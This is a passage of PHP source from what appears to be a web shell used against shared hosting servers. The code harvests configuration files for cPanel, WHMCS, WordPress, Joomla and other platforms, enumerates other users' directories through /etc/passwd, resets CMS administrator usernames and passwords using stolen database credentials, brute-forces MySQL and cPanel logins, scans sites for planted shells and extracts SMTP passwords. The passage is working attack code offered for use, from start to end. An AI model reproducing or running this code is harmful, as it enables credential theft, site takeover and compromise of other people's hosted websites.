"/home1/$user_cox/public_html/PORTAL/configuration.php" => "JoomlaPortal", "/home1/$user_cox/public_html/Portal/configuration.php" => "JoomlaPortal", "/home1/$user_cox/public_html/wp-config.php" => "WordPress", "/home1/$user_cox/public_html/wordpress/wp-config.php" => "WordPressWordpress", "/home1/$user_cox/public_html/Wordpress/wp-config.php" => "WordPressWordpress", "/home1/$user_cox/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress", "/home1/$user_cox/public_html/Home/wp-config.php" => "WordPressHome", "/home1/$user_cox/public_html/HOME/wp-config.php" => "WordPressHome", "/home1/$user_cox/public_html/home/wp-config.php" => "WordPressHome", "/home1/$user_cox/public_html/NEW/wp-config.php" => "WordPressNew", "/home1/$user_cox/public_html/New/wp-config.php" => "WordPressNew", "/home1/$user_cox/public_html/new/wp-config.php" => "WordPressNew", "/home1/$user_cox/public_html/News/wp-config.php" => "WordPressNews", "/home1/$user_cox/public_html/NEWS/wp-config.php" => "WordPressNews", "/home1/$user_cox/public_html/news/wp-config.php" => "WordPressNews", "/home1/$user_cox/public_html/Cms/wp-config.php" => "WordPressCms", "/home1/$user_cox/public_html/CMS/wp-config.php" => "WordPressCms", "/home1/$user_cox/public_html/cms/wp-config.php" => "WordPressCms", "/home1/$user_cox/public_html/Main/wp-config.php" => "WordPressMain", "/home1/$user_cox/public_html/MAIN/wp-config.php" => "WordPressMain", "/home1/$user_cox/public_html/main/wp-config.php" => "WordPressMain", "/home1/$user_cox/public_html/Blog/wp-config.php" => "WordPressBlog", "/home1/$user_cox/public_html/BLOG/wp-config.php" => "WordPressBlog", "/home1/$user_cox/public_html/blog/wp-config.php" => "WordPressBlog", "/home1/$user_cox/public_html/Blogs/wp-config.php" => "WordPressBlogs", "/home1/$user_cox/public_html/BLOGS/wp-config.php" => "WordPressBlogs", "/home1/$user_cox/public_html/blogs/wp-config.php" => "WordPressBlogs", "/home1/$user_cox/public_html/beta/wp-config.php" => "WordPressBeta", "/home1/$user_cox/public_html/Beta/wp-config.php" => "WordPressBeta", "/home1/$user_cox/public_html/BETA/wp-config.php" => "WordPressBeta", "/home1/$user_cox/public_html/PRESS/wp-config.php" => "WordPressPress", "/home1/$user_cox/public_html/Press/wp-config.php" => "WordPressPress", "/home1/$user_cox/public_html/press/wp-config.php" => "WordPressPress", "/home1/$user_cox/public_html/Wp/wp-config.php" => "WordPressWp", "/home1/$user_cox/public_html/wp/wp-config.php" => "WordPressWp", "/home1/$user_cox/public_html/WP/wp-config.php" => "WordPressWP", "/home1/$user_cox/public_html/portal/wp-config.php" => "WordPressPortal", "/home1/$user_cox/public_html/PORTAL/wp-config.php" => "WordPressPortal", "/home1/$user_cox/public_html/Portal/wp-config.php" => "WordPressPortal", "/home2/$user_cox/.my.cnf" => "cpanel", "/home2/$user_cox/.accesshash" => "WHM-accesshash", "/home2/$user_cox/public_html/bw-configs/config.ini" => "BosWeb", "/home2/$user_cox/public_html/config/koneksi.php" => "Lokomedia", "/home2/$user_cox/public_html/lokomedia/config/koneksi.php" => "Lokomedia", "/home2/$user_cox/public_html/clientarea/configuration.php" => "WHMCS", "/home2/$user_cox/public_html/whmcs/configuration.php" => "WHMCS", "/home2/$user_cox/public_html/forum/config.php" => "phpBB", "/home2/$user_cox/public_html/sites/default/settings.php" => "Drupal", "/home2/$user_cox/public_html/config/settings.inc.php" => "PrestaShop", "/home2/$user_cox/public_html/app/etc/local.xml" => "Magento", "/home2/$user_cox/public_html/admin/config.php" => "OpenCart", "/home2/$user_cox/public_html/slconfig.php" => "Sitelok", "/home2/$user_cox/public_html/application/config/database.php" => "Ellislab", "/home2/$user_cox/public_html/whm/configuration.php" => "WHMCS", "/home2/$user_cox/public_html/whmc/WHM/configuration.ph" => "WHMC", "/home2/$user_cox/public_html/central/configuration.php" => "WHM Central", "/home2/$user_cox/public_html/whm/WHMCS/configuration.php" => "WHMCS", "/home2/$user_cox/public_html/whm/whmcs/configuration.php" => "WHMCS", "/home2/$user_cox/public_html/submitticket.php" => "WHMCS", "/home2/$user_cox/public_html/configuration.php" => "Joomla", "/home2/$user_cox/public_html/Joomla/configuration.php" => "JoomlaJoomla", "/home2/$user_cox/public_html/joomla/configuration.php" => "JoomlaJoomla", "/home2/$user_cox/public_html/JOOMLA/configuration.php" => "JoomlaJoomla", "/home2/$user_cox/public_html/Home/configuration.php" => "JoomlaHome", "/home2/$user_cox/public_html/HOME/configuration.php" => "JoomlaHome", "/home2/$user_cox/public_html/home/configuration.php" => "JoomlaHome", "/home2/$user_cox/public_html/NEW/configuration.php" => "JoomlaNew", "/home2/$user_cox/public_html/New/configuration.php" => "JoomlaNew", "/home2/$user_cox/public_html/new/configuration.php" => "JoomlaNew", "/home2/$user_cox/public_html/News/configuration.php" => "JoomlaNews", "/home2/$user_cox/public_html/NEWS/configuration.php" => "JoomlaNews", "/home2/$user_cox/public_html/news/configuration.php" => "JoomlaNews", "/home2/$user_cox/public_html/Cms/configuration.php" => "JoomlaCms", "/home2/$user_cox/public_html/CMS/configuration.php" => "JoomlaCms", "/home2/$user_cox/public_html/cms/configuration.php" => "JoomlaCms", "/home2/$user_cox/public_html/Main/configuration.php" => "JoomlaMain", "/home2/$user_cox/public_html/MAIN/configuration.php" => "JoomlaMain", "/home2/$user_cox/public_html/main/configuration.php" => "JoomlaMain", "/home2/$user_cox/public_html/Blog/configuration.php" => "JoomlaBlog", "/home2/$user_cox/public_html/BLOG/configuration.php" => "JoomlaBlog", "/home2/$user_cox/public_html/blog/configuration.php" => "JoomlaBlog", "/home2/$user_cox/public_html/Blogs/configuration.php" => "JoomlaBlogs", "/home2/$user_cox/public_html/BLOGS/configuration.php" => "JoomlaBlogs", "/home2/$user_cox/public_html/blogs/configuration.php" => "JoomlaBlogs", "/home2/$user_cox/public_html/beta/configuration.php" => "JoomlaBeta", "/home2/$user_cox/public_html/Beta/configuration.php" => "JoomlaBeta", "/home2/$user_cox/public_html/BETA/configuration.php" => "JoomlaBeta", "/home2/$user_cox/public_html/PRESS/configuration.php" => "JoomlaPress", "/home2/$user_cox/public_html/Press/configuration.php" => "JoomlaPress", "/home2/$user_cox/public_html/press/configuration.php" => "JoomlaPress", "/home2/$user_cox/public_html/Wp/configuration.php" => "JoomlaWp", "/home2/$user_cox/public_html/wp/configuration.php" => "JoomlaWp", "/home2/$user_cox/public_html/WP/configuration.php" => "JoomlaWP", "/home2/$user_cox/public_html/portal/configuration.php" => "JoomlaPortal", "/home2/$user_cox/public_html/PORTAL/configuration.php" => "JoomlaPortal", "/home2/$user_cox/public_html/Portal/configuration.php" => "JoomlaPortal", "/home2/$user_cox/public_html/wp-config.php" => "WordPress", "/home2/$user_cox/public_html/wordpress/wp-config.php" => "WordPressWordpress", "/home2/$user_cox/public_html/Wordpress/wp-config.php" => "WordPressWordpress", "/home2/$user_cox/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress", "/home2/$user_cox/public_html/Home/wp-config.php" => "WordPressHome", "/home2/$user_cox/public_html/HOME/wp-config.php" => "WordPressHome", "/home2/$user_cox/public_html/home/wp-config.php" => "WordPressHome", "/home2/$user_cox/public_html/NEW/wp-config.php" => "WordPressNew", "/home2/$user_cox/public_html/New/wp-config.php" => "WordPressNew", "/home2/$user_cox/public_html/new/wp-config.php" => "WordPressNew", "/home2/$user_cox/public_html/News/wp-config.php" => "WordPressNews", "/home2/$user_cox/public_html/NEWS/wp-config.php" => "WordPressNews", "/home2/$user_cox/public_html/news/wp-config.php" => "WordPressNews", "/home2/$user_cox/public_html/Cms/wp-config.php" => "WordPressCms", "/home2/$user_cox/public_html/CMS/wp-config.php" => "WordPressCms", "/home2/$user_cox/public_html/cms/wp-config.php" => "WordPressCms", "/home2/$user_cox/public_html/Main/wp-config.php" => "WordPressMain", "/home2/$user_cox/public_html/MAIN/wp-config.php" => "WordPressMain", "/home2/$user_cox/public_html/main/wp-config.php" => "WordPressMain", "/home2/$user_cox/public_html/Blog/wp-config.php" => "WordPressBlog", "/home2/$user_cox/public_html/BLOG/wp-config.php" => "WordPressBlog", "/home2/$user_cox/public_html/blog/wp-config.php" => "WordPressBlog", "/home2/$user_cox/public_html/Blogs/wp-config.php" => "WordPressBlogs", "/home2/$user_cox/public_html/BLOGS/wp-config.php" => "WordPressBlogs", "/home2/$user_cox/public_html/blogs/wp-config.php" => "WordPressBlogs", "/home2/$user_cox/public_html/beta/wp-config.php" => "WordPressBeta", "/home2/$user_cox/public_html/Beta/wp-config.php" => "WordPressBeta", "/home2/$user_cox/public_html/BETA/wp-config.php" => "WordPressBeta", "/home2/$user_cox/public_html/PRESS/wp-config.php" => "WordPressPress", "/home2/$user_cox/public_html/Press/wp-config.php" => "WordPressPress", "/home2/$user_cox/public_html/press/wp-config.php" => "WordPressPress", "/home2/$user_cox/public_html/Wp/wp-config.php" => "WordPressWp", "/home2/$user_cox/public_html/wp/wp-config.php" => "WordPressWp", "/home2/$user_cox/public_html/WP/wp-config.php" => "WordPressWP", "/home2/$user_cox/public_html/portal/wp-config.php" => "WordPressPortal", "/home2/$user_cox/public_html/PORTAL/wp-config.php" => "WordPressPortal", "/home2/$user_cox/public_html/Portal/wp-config.php" => "WordPressPortal", "/home3/$user_cox/.my.cnf" => "cpanel", "/home3/$user_cox/.accesshash" => "WHM-accesshash", "/home3/$user_cox/public_html/bw-configs/config.ini" => "BosWeb", "/home3/$user_cox/public_html/config/koneksi.php" => "Lokomedia", "/home3/$user_cox/public_html/lokomedia/config/koneksi.php" => "Lokomedia", "/home3/$user_cox/public_html/clientarea/configuration.php" => "WHMCS", "/home3/$user_cox/public_html/whmcs/configuration.php" => "WHMCS", "/home3/$user_cox/public_html/forum/config.php" => "phpBB", "/home3/$user_cox/public_html/sites/default/settings.php" => "Drupal", "/home3/$user_cox/public_html/config/settings.inc.php" => "PrestaShop", "/home3/$user_cox/public_html/app/etc/local.xml" => "Magento", "/home3/$user_cox/public_html/admin/config.php" => "OpenCart", "/home3/$user_cox/public_html/slconfig.php" => "Sitelok", "/home3/$user_cox/public_html/application/config/database.php" => "Ellislab", "/home3/$user_cox/public_html/whm/configuration.php" => "WHMCS", "/home3/$user_cox/public_html/whmc/WHM/configuration.ph" => "WHMC", "/home3/$user_cox/public_html/central/configuration.php" => "WHM Central", "/home3/$user_cox/public_html/whm/WHMCS/configuration.php" => "WHMCS", "/home3/$user_cox/public_html/whm/whmcs/configuration.php" => "WHMCS", "/home3/$user_cox/public_html/submitticket.php" => "WHMCS", "/home3/$user_cox/public_html/configuration.php" => "Joomla", "/home3/$user_cox/public_html/Joomla/configuration.php" => "JoomlaJoomla", "/home3/$user_cox/public_html/joomla/configuration.php" => "JoomlaJoomla", "/home3/$user_cox/public_html/JOOMLA/configuration.php" => "JoomlaJoomla", "/home3/$user_cox/public_html/Home/configuration.php" => "JoomlaHome", "/home3/$user_cox/public_html/HOME/configuration.php" => "JoomlaHome", "/home3/$user_cox/public_html/home/configuration.php" => "JoomlaHome", "/home3/$user_cox/public_html/NEW/configuration.php" => "JoomlaNew", "/home3/$user_cox/public_html/New/configuration.php" => "JoomlaNew", "/home3/$user_cox/public_html/new/configuration.php" => "JoomlaNew", "/home3/$user_cox/public_html/News/configuration.php" => "JoomlaNews", "/home3/$user_cox/public_html/NEWS/configuration.php" => "JoomlaNews", "/home3/$user_cox/public_html/news/configuration.php" => "JoomlaNews", "/home3/$user_cox/public_html/Cms/configuration.php" => "JoomlaCms", "/home3/$user_cox/public_html/CMS/configuration.php" => "JoomlaCms", "/home3/$user_cox/public_html/cms/configuration.php" => "JoomlaCms", "/home3/$user_cox/public_html/Main/configuration.php" => "JoomlaMain", "/home3/$user_cox/public_html/MAIN/configuration.php" => "JoomlaMain", "/home3/$user_cox/public_html/main/configuration.php" => "JoomlaMain", "/home3/$user_cox/public_html/Blog/configuration.php" => "JoomlaBlog", "/home3/$user_cox/public_html/BLOG/configuration.php" => "JoomlaBlog", "/home3/$user_cox/public_html/blog/configuration.php" => "JoomlaBlog", "/home3/$user_cox/public_html/Blogs/configuration.php" => "JoomlaBlogs", "/home3/$user_cox/public_html/BLOGS/configuration.php" => "JoomlaBlogs", "/home3/$user_cox/public_html/blogs/configuration.php" => "JoomlaBlogs", "/home3/$user_cox/public_html/beta/configuration.php" => "JoomlaBeta", "/home3/$user_cox/public_html/Beta/configuration.php" => "JoomlaBeta", "/home3/$user_cox/public_html/BETA/configuration.php" => "JoomlaBeta", "/home3/$user_cox/public_html/PRESS/configuration.php" => "JoomlaPress", "/home3/$user_cox/public_html/Press/configuration.php" => "JoomlaPress", "/home3/$user_cox/public_html/press/configuration.php" => "JoomlaPress", "/home3/$user_cox/public_html/Wp/configuration.php" => "JoomlaWp", "/home3/$user_cox/public_html/wp/configuration.php" => "JoomlaWp", "/home3/$user_cox/public_html/WP/configuration.php" => "JoomlaWP", "/home3/$user_cox/public_html/portal/configuration.php" => "JoomlaPortal", "/home3/$user_cox/public_html/PORTAL/configuration.php" => "JoomlaPortal", "/home3/$user_cox/public_html/Portal/configuration.php" => "JoomlaPortal", "/home3/$user_cox/public_html/wp-config.php" => "WordPress", "/home3/$user_cox/public_html/wordpress/wp-config.php" => "WordPressWordpress", "/home3/$user_cox/public_html/Wordpress/wp-config.php" => "WordPressWordpress", "/home3/$user_cox/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress", "/home3/$user_cox/public_html/Home/wp-config.php" => "WordPressHome", "/home3/$user_cox/public_html/HOME/wp-config.php" => "WordPressHome", "/home3/$user_cox/public_html/home/wp-config.php" => "WordPressHome", "/home3/$user_cox/public_html/NEW/wp-config.php" => "WordPressNew", "/home3/$user_cox/public_html/New/wp-config.php" => "WordPressNew", "/home3/$user_cox/public_html/new/wp-config.php" => "WordPressNew", "/home3/$user_cox/public_html/News/wp-config.php" => "WordPressNews", "/home3/$user_cox/public_html/NEWS/wp-config.php" => "WordPressNews", "/home3/$user_cox/public_html/news/wp-config.php" => "WordPressNews", "/home3/$user_cox/public_html/Cms/wp-config.php" => "WordPressCms", "/home3/$user_cox/public_html/CMS/wp-config.php" => "WordPressCms", "/home3/$user_cox/public_html/cms/wp-config.php" => "WordPressCms", "/home3/$user_cox/public_html/Main/wp-config.php" => "WordPressMain", "/home3/$user_cox/public_html/MAIN/wp-config.php" => "WordPressMain", "/home3/$user_cox/public_html/main/wp-config.php" => "WordPressMain", "/home3/$user_cox/public_html/Blog/wp-config.php" => "WordPressBlog", "/home3/$user_cox/public_html/BLOG/wp-config.php" => "WordPressBlog", "/home3/$user_cox/public_html/blog/wp-config.php" => "WordPressBlog", "/home3/$user_cox/public_html/Blogs/wp-config.php" => "WordPressBlogs", "/home3/$user_cox/public_html/BLOGS/wp-config.php" => "WordPressBlogs", "/home3/$user_cox/public_html/blogs/wp-config.php" => "WordPressBlogs", "/home3/$user_cox/public_html/beta/wp-config.php" => "WordPressBeta", "/home3/$user_cox/public_html/Beta/wp-config.php" => "WordPressBeta", "/home3/$user_cox/public_html/BETA/wp-config.php" => "WordPressBeta", "/home3/$user_cox/public_html/PRESS/wp-config.php" => "WordPressPress", "/home3/$user_cox/public_html/Press/wp-config.php" => "WordPressPress", "/home3/$user_cox/public_html/press/wp-config.php" => "WordPressPress", "/home3/$user_cox/public_html/Wp/wp-config.php" => "WordPressWp", "/home3/$user_cox/public_html/wp/wp-config.php" => "WordPressWp", "/home3/$user_cox/public_html/WP/wp-config.php" => "WordPressWP", "/home3/$user_cox/public_html/portal/wp-config.php" => "WordPressPortal", "/home3/$user_cox/public_html/PORTAL/wp-config.php" => "WordPressPortal", "/home3/$user_cox/public_html/Portal/wp-config.php" => "WordPressPortal" ); foreach($grab_config as $config => $nama_config) { $ambil_config = file_get_contents($config); if($ambil_config == '') { } else { $file_config = fopen("cox_config/$user_GB-$nama_config.txt","w"); fputs($file_config,$ambil_config); } } } } echo "
Done
"; }else{ echo "
etc/passw ( Error ? Bypass Here )

\n"; } } elseif($_GET['do'] == 'jumping') { $i = 0; echo "
"; $etc = fopen("/etc/passwd", "r"); while($passwd = fgets($etc)) { if($passwd == '' || !$etc) { echo "Can't read /etc/passwd"; } else { preg_match_all('/(.*?):x:/', $passwd, $user_jumping); foreach($user_jumping[1] as $user_idx_jump) { $user_jumping_dir = "/home/$user_idx_jump/public_html"; if(is_readable($user_jumping_dir)) { $i++; $jrw = "[R] $user_jumping_dir
"; if(is_writable($user_jumping_dir)) { $jrw = "[RW] $user_jumping_dir
"; } echo $jrw; $domain_jump = file_get_contents("/etc/named.conf"); if($domain_jump == '') { echo " => ( gabisa ambil nama domain nya )
"; } else { preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump); foreach($domains_jump[1] as $dj) { $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj")); $user_jumping_url = $user_jumping_url['name']; if($user_jumping_url == $user_idx_jump) { echo " => ( $dj )
"; break; } } } } } } } if($i == 0) { } else { echo "
Total ada ".$i." Kimcil di ".gethostbyname($_SERVER['HTTP_HOST']).""; } echo "

"; } elseif($_GET['do'] == 'auto_edit_user') { if($_POST['hajar']) { if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) { echo "username atau password harus lebih dari 6 karakter"; } else { $user_baru = $_POST['user_baru']; $pass_baru = md5($_POST['pass_baru']); $conf = $_POST['config_dir']; $scan_conf = scandir($conf); foreach($scan_conf as $file_conf) { if(!is_file("$conf/$file_conf")) continue; $config = file_get_contents("$conf/$file_conf"); if(preg_match("/JConfig|joomla/",$config)) { $dbhost = ambilkata($config,"host = '","'"); $dbuser = ambilkata($config,"user = '","'"); $dbpass = ambilkata($config,"password = '","'"); $dbname = ambilkata($config,"db = '","'"); $dbprefix = ambilkata($config,"dbprefix = '","'"); $prefix = $dbprefix."users"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC"); $result = mysql_fetch_array($q); $id = $result['id']; $site = ambilkata($config,"sitename = '","'"); $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'"); echo "Config => ".$file_conf."
"; echo "CMS => Joomla
"; if($site == '') { echo "Sitename => error, gabisa ambil nama domain nya
"; } else { echo "Sitename => $site
"; } if(!$update OR !$conn OR !$db) { echo "Status => ".mysql_error()."

"; } else { echo "Status => sukses edit user, silakan login dengan user & pass yang baru.

"; } mysql_close($conn); } elseif(preg_match("/WordPress/",$config)) { $dbhost = ambilkata($config,"DB_HOST', '","'"); $dbuser = ambilkata($config,"DB_USER', '","'"); $dbpass = ambilkata($config,"DB_PASSWORD', '","'"); $dbname = ambilkata($config,"DB_NAME', '","'"); $dbprefix = ambilkata($config,"table_prefix = '","'"); $prefix = $dbprefix."users"; $option = $dbprefix."options"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC"); $result = mysql_fetch_array($q); $id = $result[ID]; $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC"); $result2 = mysql_fetch_array($q2); $target = $result2[option_value]; if($target == '') { $url_target = "Login => error, gabisa ambil nama domain nyaa
"; } else { $url_target = "Login => $target/wp-login.php
"; } $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'"); echo "Config => ".$file_conf."
"; echo "CMS => Wordpress
"; echo $url_target; if(!$update OR !$conn OR !$db) { echo "Status => ".mysql_error()."

"; } else { echo "Status => sukses edit user, silakan login dengan user & pass yang baru.

"; } mysql_close($conn); } elseif(preg_match("/Magento|Mage_Core/",$config)) { $dbhost = ambilkata($config,""); $dbuser = ambilkata($config,""); $dbpass = ambilkata($config,""); $dbname = ambilkata($config,""); $dbprefix = ambilkata($config,""); $prefix = $dbprefix."admin_user"; $option = $dbprefix."core_config_data"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC"); $result = mysql_fetch_array($q); $id = $result[user_id]; $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'"); $result2 = mysql_fetch_array($q2); $target = $result2[value]; if($target == '') { $url_target = "Login => error, gabisa ambil nama domain nyaa
"; } else { $url_target = "Login => $target/admin/
"; } $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'"); echo "Config => ".$file_conf."
"; echo "CMS => Magento
"; echo $url_target; if(!$update OR !$conn OR !$db) { echo "Status => ".mysql_error()."

"; } else { echo "Status => sukses edit user, silakan login dengan user & pass yang baru.

"; } mysql_close($conn); } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) { $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'"); $dbuser = ambilkata($config,"'DB_USERNAME', '","'"); $dbpass = ambilkata($config,"'DB_PASSWORD', '","'"); $dbname = ambilkata($config,"'DB_DATABASE', '","'"); $dbprefix = ambilkata($config,"'DB_PREFIX', '","'"); $prefix = $dbprefix."user"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC"); $result = mysql_fetch_array($q); $id = $result[user_id]; $target = ambilkata($config,"HTTP_SERVER', '","'"); if($target == '') { $url_target = "Login => error, gabisa ambil nama domain nyaa
"; } else { $url_target = "Login => $target
"; } $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'"); echo "Config => ".$file_conf."
"; echo "CMS => OpenCart
"; echo $url_target; if(!$update OR !$conn OR !$db) { echo "Status => ".mysql_error()."

"; } else { echo "Status => sukses edit user, silakan login dengan user & pass yang baru.

"; } mysql_close($conn); } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) { $dbhost = ambilkata($config,'server = "','"'); $dbuser = ambilkata($config,'username = "','"'); $dbpass = ambilkata($config,'password = "','"'); $dbname = ambilkata($config,'database = "','"'); $prefix = "users"; $option = "identitas"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC"); $result = mysql_fetch_array($q); $target = $result[alamat_website]; if($target == '') { $target2 = $result[url]; $url_target = "Login => error, gabisa ambil nama domain nyaa
"; if($target2 == '') { $url_target2 = "Login => error, gabisa ambil nama domain nyaa
"; } else { $cek_login3 = file_get_contents("$target2/adminweb/"); $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/"); if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) { $url_target2 = "Login => $target2/adminweb
"; } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) { $url_target2 = "Login => $target2/lokomedia/adminweb
"; } else { $url_target2 = "Login => $target2 [ gatau admin login nya dimana :p ]
"; } } } else { $cek_login = file_get_contents("$target/adminweb/"); $cek_login2 = file_get_contents("$target/lokomedia/adminweb/"); if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) { $url_target = "Login => $target/adminweb
"; } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) { $url_target = "Login => $target/lokomedia/adminweb
"; } else { $url_target = "Login => $target [ gatau admin login nya dimana :p ]
"; } } $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'"); echo "Config => ".$file_conf."
"; echo "CMS => Lokomedia
"; if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) { echo $url_target2; } else { echo $url_target; } if(!$update OR !$conn OR !$db) { echo "Status => ".mysql_error()."

"; } else { echo "Status => sukses edit user, silakan login dengan user & pass yang baru.

"; } mysql_close($conn); } } } } else { echo "

Auto Edit User Config


DIR Config:


Set User & Pass:


NB: Tools ini work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )
"; } }elseif($_GET['do'] == 'shelscan') { echo'

Shell Finder




'; if (isset($_POST["scan"])) { $url = $_POST['traget']; echo "
Scanning ".$url."

"; echo "Result :
"; $shells = array("WSO.php","dz.php","cpanel.php","cpn.php","sql.php","mysql.php","madspot.php","cp.php","cpbt.php","sYm.php", "x.php","r99.php","lol.php","jo.php","wp.php","whmcs.php","shellz.php","d0main.php","d0mains.php","users.php", "Cgishell.pl","killer.php","changeall.php","2.php","Sh3ll.php","dz0.php","dam.php","user.php","dom.php","whmcs.php", "vb.zip","r00t.php","c99.php","gaza.php","1.php","wp.zip"."wp-content/plugins/disqus-comment-system/disqus.php", "d0mains.php","wp-content/plugins/akismet/akismet.php","madspotshell.php","Sym.php","c22.php","c100.php", "wp-content/plugins/akismet/admin.php#","wp-content/plugins/google-sitemap-generator/sitemap-core.php#", "wp-content/plugins/akismet/widget.php#","Cpanel.php","zone-h.php","tmp/user.php","tmp/Sym.php","cp.php", "tmp/madspotshell.php","tmp/root.php","tmp/whmcs.php","tmp/index.php","tmp/2.php","tmp/dz.php","tmp/cpn.php", "tmp/changeall.php","tmp/Cgishell.pl","tmp/sql.php","tmp/admin.php","cliente/downloads/h4xor.php", "whmcs/downloads/dz.php","L3b.php","d.php","tmp/d.php","tmp/L3b.php","wp-content/plugins/akismet/admin.php", "templates/rhuk_milkyway/index.php","templates/beez/index.php","admin1.php","upload.php","up.php","vb.zip","vb.rar", "admin2.asp","uploads.php","sa.php","sysadmins/","admin1/","administration/Sym.php","images/Sym.php", "/r57.php","/wp-content/plugins/disqus-comment-system/disqus.php","/shell.php","/sa.php","/admin.php", "/sa2.php","/2.php","/gaza.php","/up.php","/upload.php","/uploads.php","/templates/beez/index.php","shell.php","/amad.php", "/t00.php","/dz.php","/site.rar","/Black.php","/site.tar.gz","/home.zip","/home.rar","/home.tar","/home.tar.gz", "/forum.zip","/forum.rar","/forum.tar","/forum.tar.gz","/test.txt","/ftp.txt","/user.txt","/site.txt","/error_log","/error", "/cpanel","/awstats","/site.sql","/vb.sql","/forum.sql","/backup.sql","/back.sql","/data.sql","wp.rar/", "wp-content/plugins/disqus-comment-system/disqus.php","asp.aspx","/templates/beez/index.php","tmp/vaga.php", "tmp/killer.php","whmcs.php","tmp/killer.php","tmp/domaine.pl","tmp/domaine.php","useradmin/", "tmp/d0maine.php","d0maine.php","tmp/sql.php","tmp/dz1.php","dz1.php","forum.zip","Symlink.php","Symlink.pl", "forum.rar","joomla.zip","joomla.rar","wp.php","buck.sql","sysadmin.php","images/c99.php", "xd.php", "c100.php", "spy.aspx","xd.php","tmp/xd.php","sym/root/home/","billing/killer.php","tmp/upload.php","tmp/admin.php", "Server.php","tmp/uploads.php","tmp/up.php","Server/","wp-admin/c99.php","tmp/priv8.php","priv8.php","cgi.pl/", "tmp/cgi.pl","downloads/dom.php","templates/ja-helio-farsi/index.php","webadmin.html","admins.php", "/wp-content/plugins/count-per-day/js/yc/d00.php", "admins/","admins.asp","admins.php","wp.zip","wso2.5.1","pasir.php","pasir2.php","up.php","cok.php","newfile.php","upl.php",".php","a.php","crot.php","kontol.php","hmei7.php","jembut.php","memek.php","tai.php","rabit.php","indoxploit.php","a.php","hemb.php","hack.php","galau.php","HsH.php","indoXploit.php","asu.php","wso.php","lol.php","idx.php","rabbit.php","1n73ction.php","k.php","mailer.php","mail.php","temp.php","c.php","d.php","IDB.php","indo.php","indonesia.php","semvak.php","ndasmu.php","cox.php","as.php","ad.php","aa.php","file.php","peju.php","asd.php","configs.php","ass.php","z.php"); foreach ($shells as $shell){ $headers = get_headers("$url$shell"); // if (eregi('200', $headers[0])) { echo "$url$shell Done :D


"; // $dz = fopen('shells.txt', 'a+'); $suck = "$url$shell"; fwrite($dz, $suck."\n"); } } echo "Shell [ shells.txt ]"; } } elseif($_GET['do'] == 'cpanel') { if($_POST['crack']) { $usercp = explode("\r\n", $_POST['user_cp']); $passcp = explode("\r\n", $_POST['pass_cp']); $i = 0; foreach($usercp as $ucp) { foreach($passcp as $pcp) { if(@mysql_connect('localhost', $ucp, $pcp)) { if($_SESSION[$ucp] && $_SESSION[$pcp]) { } else { $_SESSION[$ucp] = "1"; $_SESSION[$pcp] = "1"; $i++; echo "username ($ucp) password ($pcp)
"; } } } } if($i == 0) { } else { echo "
Nemu ".$i." Cpanel by GBrother"; } } else { echo "
USER:

PASS:

NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )
"; } } elseif($_GET['do'] == 'smtp') { echo "
NB: Tools ini work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )

"; function scj($dir) { $dira = scandir($dir); foreach($dira as $dirb) { if(!is_file("$dir/$dirb")) continue; $ambil = file_get_contents("$dir/$dirb"); $ambil = str_replace("$", "", $ambil); if(preg_match("/JConfig|joomla/", $ambil)) { $smtp_host = ambilkata($ambil,"smtphost = '","'"); $smtp_auth = ambilkata($ambil,"smtpauth = '","'"); $smtp_user = ambilkata($ambil,"smtpuser = '","'"); $smtp_pass = ambilkata($ambil,"smtppass = '","'"); $smtp_port = ambilkata($ambil,"smtpport = '","'"); $smtp_secure = ambilkata($ambil,"smtpsecure = '","'"); echo "SMTP Host: $smtp_host
"; echo "SMTP port: $smtp_port
"; echo "SMTP user: $smtp_user
"; echo "SMTP pass: $smtp_pass
"; echo "SMTP auth: $smtp_auth
"; echo "SMTP secure: $smtp_secure

